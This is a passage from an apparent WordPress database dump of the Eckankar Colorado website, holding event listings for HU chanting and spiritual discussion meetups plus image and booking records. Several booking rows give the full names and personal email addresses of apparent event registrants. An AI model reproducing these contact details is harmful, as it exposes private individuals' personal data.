12:39:19','2023-09-09 18:39:19','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d','','','2023-09-09 12:39:19','2023-09-09 18:39:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d.jpg',0,'attachment','image/jpeg',0),(269024,2,'2023-09-09 12:39:41','2023-09-09 18:39:41','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125','','','2023-09-09 12:39:41','2023-09-09 18:39:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125.jpg',0,'attachment','image/jpeg',0),(268113,1000069,'2023-03-05 10:30:00','2023-03-05 17:30:00','','Micah Ingram - musickidd28@gmail.com','','publish','closed','closed','','micah-ingram-musickidd28gmail-com','','','2023-03-05 10:30:00','2023-03-05 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268113',0,'mec-books','',0),(268114,0,'2023-02-27 10:09:55','2023-02-27 17:09:55','','','','publish','closed','closed','','268114','','','2023-02-27 10:09:55','2023-02-27 17:09:55','',0,'https://eckankar-colorado.org/nf_sub/268114/',0,'nf_sub','',0),(268117,2,'2023-02-28 12:52:31','2023-02-28 19:52:31','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/Vqi2UUMgpAM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>','','','publish','closed','closed','','bdcba8eb65c9d4bf21eda16bbbf4f6d0','','','2023-02-28 12:52:31','2023-02-28 19:52:31','',0,'https://eckankar-colorado.org/bdcba8eb65c9d4bf21eda16bbbf4f6d0/',0,'oembed_cache','',0),(268118,2,'2023-02-28 12:56:37','2023-02-28 19:56:37','','free-eck-books-lg-2','','inherit','closed','closed','','free-eck-books-lg-2','','','2023-02-28 12:56:37','2023-02-28 19:56:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2.png',0,'attachment','image/png',0),(268119,2,'2023-02-28 12:57:30','2023-02-28 19:57:30','','free-eck-books-bk','','inherit','closed','closed','','free-eck-books-bk','','','2023-02-28 12:57:30','2023-02-28 19:57:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg',0,'attachment','image/jpeg',0),(269234,2,'2023-10-20 09:43:11','2023-10-20 15:43:11','','Initiate Pages','','publish','closed','closed','','initiate-pages','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=269234',16,'nav_menu_item','',0),(268204,2,'2023-03-17 18:28:26','2023-03-18 00:28:26','','free-eck-books-lg-2','','inherit','closed','closed','','free-eck-books-lg-2-2','','','2023-03-17 18:28:26','2023-03-18 00:28:26','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png',0,'attachment','image/png',0),(268201,2,'2023-03-17 18:18:33','2023-03-18 00:18:33','','newsletter-lg-1','','inherit','closed','closed','','newsletter-lg-1','','','2023-03-17 18:18:33','2023-03-18 00:18:33','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png',0,'attachment','image/png',0),(268150,2,'2023-03-03 08:15:45','2023-03-03 15:15:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy. Each roundtable&nbsp;consists of up to 12 participants.&nbsp;&nbsp;<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Living Your Life\'s Purpose\'<br>Roundtable Discussion - In Person','','publish','closed','closed','','living-your-lifes-purposeroundtable-discussion-in-person','','','2023-03-03 08:32:25','2023-03-03 15:32:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268150',0,'mec-events','',0),(268151,2,'2023-03-03 08:31:32','2023-03-03 15:31:32','','sunset-shell-2','','inherit','closed','closed','','sunset-shell-2','','','2023-06-30 20:47:52','2023-07-01 02:47:52','',268150,'https://eckankar-colorado.org/wp-content/uploads/2023/03/sunset-shell-2.jpg',0,'attachment','image/jpeg',0),(268152,0,'2023-03-03 10:38:41','2023-03-03 17:38:41','','','','publish','closed','closed','','268152','','','2023-03-03 10:38:41','2023-03-03 17:38:41','',0,'https://eckankar-colorado.org/nf_sub/268152/',0,'nf_sub','',0),(268157,15,'2023-03-05 07:13:42','2023-03-05 14:13:42','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover ways to recognize God’s assistance and love in your life.</strong></span><br>\r\n<span style=\"font-size: 14pt;\">*How have you experienced God’s love in your daily life?</span><br>\r\n<span style=\"font-size: 14pt;\">*How can you increase your awareness of God’s hand in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*How can you ask for Divine help when you need it?</span><br>\r\n<span style=\"font-size: 14pt;\">*How does divine love play a role in recognizing the love of Spirit?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you gain awareness of God’s hand in you daily existence. The evening will include contemplation and discussion on how Spirit is always with you to help create the life you want to live.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, <em>ECKANKAR: Ancient Wisdom for Today</em>, “When you let God into your life, divine love also enters. Experiences and coincidences you would have discounted as trivial before now become miraculous. Life itself is rich, and you discover the joy of service and charity. God’s love awakens your heart.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection:&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more info and more events:&nbsp;<a class=\"text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Colorado Website</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/292008308/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Seeing God\'s Hand in Every Situation\'<br>In Person Discussion','','publish','closed','closed','','seeing-gods-hand-in-every-situationmeetup-in-person','','','2023-03-07 21:17:42','2023-03-08 04:17:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268157',0,'mec-events','',0),(268159,15,'2023-03-05 07:42:38','2023-03-05 14:42:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you looking for answers, guidance, and protection. Discover how to:</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Listen to the Voice of God</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Attune to your true self</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Work with an inner guide</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Ignite your creativity to solve problems</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you gain awareness of God’s hand in your daily existence. The evening will include contemplation and discussion on how Spirit is always with you to help create the life you want to live.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, <em>ECKANKAR: Ancient Wisdom for Today</em>, “When you let God into your life, divine love also enters. Experiences and coincidences you would have discounted as trivial before now become miraculous. Life itself is rich, and you discover the joy of service and charity. God’s love awakens your heart.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection:&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more info and more events:&nbsp;<a class=\"text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Colorado Website</a></span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/292008042/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Inner Guidance in Your Everyday Life\'<br>In Person Discussion','','publish','closed','closed','','inner-guidance-in-your-everyday-lifemeetup-in-person','','','2023-03-07 21:21:50','2023-03-08 04:21:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268159',0,'mec-events','',0),(268160,1000022,'2023-03-05 10:30:00','2023-03-05 17:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-9','','','2023-03-05 10:30:00','2023-03-05 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268160',0,'mec-books','',0),(268161,15,'2023-03-05 09:21:48','2023-03-05 16:21:48','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">I have been singing&nbsp;<em>HU,</em>&nbsp;an ancient mantra and sacred sound for over 40 years. Singing HU has helped change my awareness, acting as a tuning fork, aligning me as Soul, with unconditional love, creativity, healing, and expanded awareness.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em>HU</em>&nbsp;is an ancient name for God, a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The following quote illustrates my own experience:</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"When you sing HU, you are spiritualizing your attention. You are saying, \"I am putting all my attention, heart, and Soul upon the highest good I can imagine.\" From&nbsp;<em>The Sound of Soul</em>&nbsp;by Harold Klemp, p. 39</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">During this event, you will have the opportunity to experience some of the benefits of singing HU: inner peace and calm, expanded awareness, alignment with your true purpose, and healing of the heart. To learn more about HU, you can read more at&nbsp;<a class=\"text-viridian\" href=\"http://www.hearhu.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">www.hearhu.org</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event includes singing HU for 15-20 minutes, a few minutes of quiet contemplation, followed by a spiritual conversation with others of like heart. Our discussions are free and open to people of all faiths and beliefs - friends, and family. It will be held at the Pagosa Lakes Clubhouse, 230-A Port Ave, Pagosa Springs, on Sunday, March 12th, and begins at 1:00P.</span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/291985276/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'How to Enliven Every Aspect of Your Life: Access the God Current with HU\'<br>In Person Discussion','','publish','closed','closed','','how-to-enliven-every-aspect-of-your-life-access-the-god-current-with-humeetup-in-person','','','2023-03-07 21:19:42','2023-03-08 04:19:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268161',0,'mec-events','',0),(268162,15,'2023-03-05 09:18:41','2023-03-05 16:18:41','','HUBubble','','inherit','closed','closed','','hububble','','','2023-03-05 09:18:41','2023-03-05 16:18:41','',268161,'https://eckankar-colorado.org/wp-content/uploads/2023/03/HUBubble.webp',0,'attachment','image/webp',0),(268163,1000061,'2023-03-05 10:30:00','2023-03-05 17:30:00','','Chukwuebuka - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-ocekenediliyahoo-com-2','','','2023-03-05 10:30:00','2023-03-05 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268163',0,'mec-books','',0),(268164,1000070,'2023-03-05 10:30:00','2023-03-05 17:30:00','','LeAnn - ponyexpressmama@yahoo.com','','publish','closed','closed','','leann-ponyexpressmamayahoo-com','','','2023-03-05 10:30:00','2023-03-05 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268164',0,'mec-books','',0),(268165,1000071,'2023-03-05 10:30:00','2023-03-05 17:30:00','','Elaine Dahlgren - elainedahl@yahoo.com','','publish','closed','closed','','elaine-dahlgren-elainedahlyahoo-com','','','2023-03-05 10:30:00','2023-03-05 17:30:00','',0,'https://eckankar-colorado.org/mec-books/elaine-dahlgren-elainedahlyahoo-com/',0,'mec-books','',0),(268284,0,'2023-03-29 16:38:14','2023-03-29 22:38:14','','','','publish','closed','closed','','268284','','','2023-03-29 16:38:14','2023-03-29 22:38:14','',0,'https://eckankar-colorado.org/nf_sub/268284/',0,'nf_sub','',0),(268202,2,'2023-03-17 18:21:34','2023-03-18 00:21:34','','meetup-wide-2','','inherit','closed','closed','','meetup-wide-2','','','2023-03-17 18:21:34','2023-03-18 00:21:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png',0,'attachment','image/png',0),(268177,15,'2023-03-09 17:56:17','2023-03-10 00:56:17','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The most secret part of yourself is the heart of love. The greatest gift that life can give you is a means of getting in touch with this mysterious part, which is the secret of life itself.\"</span><br>\r\n<span style=\"font-size: 14pt;\">―Harold Klemp, <em>Spiritual Wisdom on Prayer, Meditation, and Contemplation</em>, p. 35</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss highlights of the booklet,&nbsp;<em><strong>Spiritual Wisdom on Prayer, Meditation and Contemplation</strong></em>. You will be given a free copy of this book if you wish. Some of the topics we will explore include:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">How can I get to the most secret part of myself?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">When is the best time to pray, ponder, or contemplate?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">How to Take the Next Spiritual Step</span></li>\r\n	<li><span style=\"font-size: 14pt;\">What are the techniques that help in your daily life?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">How to expand your consciousness.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/292097255/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Special Ways To Get Divine Help In Daily Life<br>In Person Discussion','','publish','closed','closed','','special-ways-to-get-divine-help-in-daily-lifein-person-discussion','','','2023-03-09 18:23:42','2023-03-10 01:23:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268177',0,'mec-events','',0),(268178,15,'2023-03-09 18:02:19','2023-03-10 01:02:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to bring new life into your spiritual journey?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. It is the Sound of Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a sparkplug, igniting Soul to reach higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">People of all faiths and beliefs are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/290972844/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Sparkplug to Spiritual Growth: Discover HU, Ancient Mantra and Sacred Sound<br>In Person Discussion','','publish','closed','closed','','sparkplug-to-spiritual-growth-discover-hu-ancient-mantra-and-sacred-soundin-person-discussion','','','2023-03-09 18:21:27','2023-03-10 01:21:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268178',0,'mec-events','',0),(268179,15,'2023-03-09 18:10:31','2023-03-10 01:10:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>Learn to communicate with the most sacred part of yourself.</strong></em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of chanting the sacred word, HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The Meetup will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and casual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar as a community service and is free of charge. Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/292138711/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Awaken to Higher Consciousness, Love, Creativity, Healing, and Awareness<br>In Person Discussion','','publish','closed','closed','','awaken-to-higher-consciousness-love-creativity-healing-and-awarenessin-person-discussion','','','2023-03-09 18:26:14','2023-03-10 01:26:14','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268179',0,'mec-events','',0),(268180,15,'2023-03-09 18:08:57','2023-03-10 01:08:57','','GoldenWorldPerson','','inherit','closed','closed','','goldenworldperson','','','2023-03-09 18:08:57','2023-03-10 01:08:57','',268179,'https://eckankar-colorado.org/wp-content/uploads/2023/03/GoldenWorldPerson.webp',0,'attachment','image/webp',0),(268181,15,'2023-03-09 18:16:45','2023-03-10 01:16:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><em><strong>Explore a daily spiritual practice for more joy, wisdom, peace.</strong></em></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by spiritual conversation with others of like heart. Our conversation will be centered around how this sacred sound can change your whole outlook on life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This free event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/292097617/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','15 Minutes to Change Your Life - HU Sound of Soul<br>In Person Discussion','','publish','closed','closed','','15-minutes-to-change-your-life-hu-sound-of-soulin-person-discussion','','','2023-04-19 09:54:12','2023-04-19 15:54:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268181',0,'mec-events','',0),(268396,0,'2023-04-19 12:43:52','2023-04-19 18:43:52','','','','publish','closed','closed','','268396','','','2023-04-19 12:43:52','2023-04-19 18:43:52','',0,'https://eckankar-colorado.org/nf_sub/268396/',0,'nf_sub','',0),(268182,1000073,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Gai Lawson - gai.lawson@gmail.com','','publish','closed','closed','','gai-lawson-gai-lawsongmail-com','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268182',0,'mec-books','',0),(268183,1000012,'2023-03-12 10:30:00','2023-03-12 16:30:00','','Lynn Gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com-5','','','2023-03-12 10:30:00','2023-03-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268183',0,'mec-books','',0),(268206,2,'2023-03-17 18:36:35','2023-03-18 00:36:35','','footer-9-3-16-23','','inherit','closed','closed','','footer-9-3-16-23','','','2023-03-17 18:36:35','2023-03-18 00:36:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/footer-9-3-16-23.png',0,'attachment','image/png',0),(268256,2,'2023-03-25 16:57:26','2023-03-25 22:57:26','','colorado-springs-grand-opening','','inherit','closed','closed','','colorado-springs-grand-opening','','','2023-03-25 16:57:26','2023-03-25 